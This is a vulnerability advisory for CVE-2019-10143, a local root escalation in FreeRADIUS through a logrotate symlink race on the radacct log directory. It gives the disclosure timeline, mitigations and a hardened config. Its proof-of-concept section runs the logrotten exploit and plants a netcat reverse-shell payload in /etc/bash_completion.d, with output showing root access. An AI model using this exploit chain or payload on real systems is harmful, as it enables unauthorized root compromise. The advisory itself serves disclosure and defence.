* Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
* CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
* Accessibility: Local
* Severity: Low
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)

## Vulnerability Description
The log directory "radacct" is owned by user "radiusd". Because of an unsafe 
interaction with logrotate, user "radiusd" can elevate privileges to "root".
User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files are rotated once a day (or at any other configured frequency) by 
logrotate running as user root. The configuration does not use the "su" 
directive:

```
/var/log/radius/radacct/*/detail {
monthly
rotate 4
nocreate
missingok
compress
}
```

Since logrotate is prone to a race condition (see 
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition), 
user "radiusd" can replace the directory /var/log/radius/radacct/logdir with a 
symbolic link to any directory (for example /etc/bash_completion.d). logrotate 
will then place the compressed files AS ROOT into /etc/bash_completion.d and set 
their owner and group to "radiusd.radiusd". An attacker could simply place a 
reverse shell into this file; as soon as root logs in, the reverse shell is 
executed.

Details of the race-condition in logrotate can be found at:

*   https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
*   
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
*   https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who has already gained a shell 
as user "radiusd" can elevate privileges to "root". After downloading and 
compiling, the exploit is executed and waits for the next daily run of 
logrotate. If the rotation of the log file succeeds, a new file containing the 
reverse shell payload is written into /etc/bash_completion.d/ with owner 
"radiusd". As soon as root logs in, the reverse shell is executed and opens a 
shell on the attacker's netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd 33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost  &); fi" > /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 
listening on [any]  ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate 
the privileges to "root". The fact that another exploit is needed to get a 
shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in 
the directories he can write to.
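A hardened version of the logrotate block quoted in the description, added here as an example; it is not FreeRADIUS's or Red Hat's shipped file. In logrotate's configuration syntax the `su` directive takes the user and the group as two separate words. With it present, the rotation of everything under radacct runs as radiusd, so a symlinked sub-directory can no longer make root write files into /etc.

```conf
/var/log/radius/radacct/*/detail {
    su radiusd radiusd
    monthly
    rotate 4
    nocreate
    missingok
    compress
}
```

A quick check that the directive is in place on a host, given an unprivileged shell: `grep -n '^\s*su ' /etc/logrotate.d/radiusd` should return the line above; logrotate additionally refuses to rotate inside a directory that is writable by a non-root user unless `su` is set, which is the warning to look for in its output.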

## References:
*  https://access.redhat.com/security/cve/cve-2019-10143
*  https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote 
code execution in freeradius that allows an attacker to gain a shell as user 
"radiusd"]( https://freeradius.org/security/).  CVE's are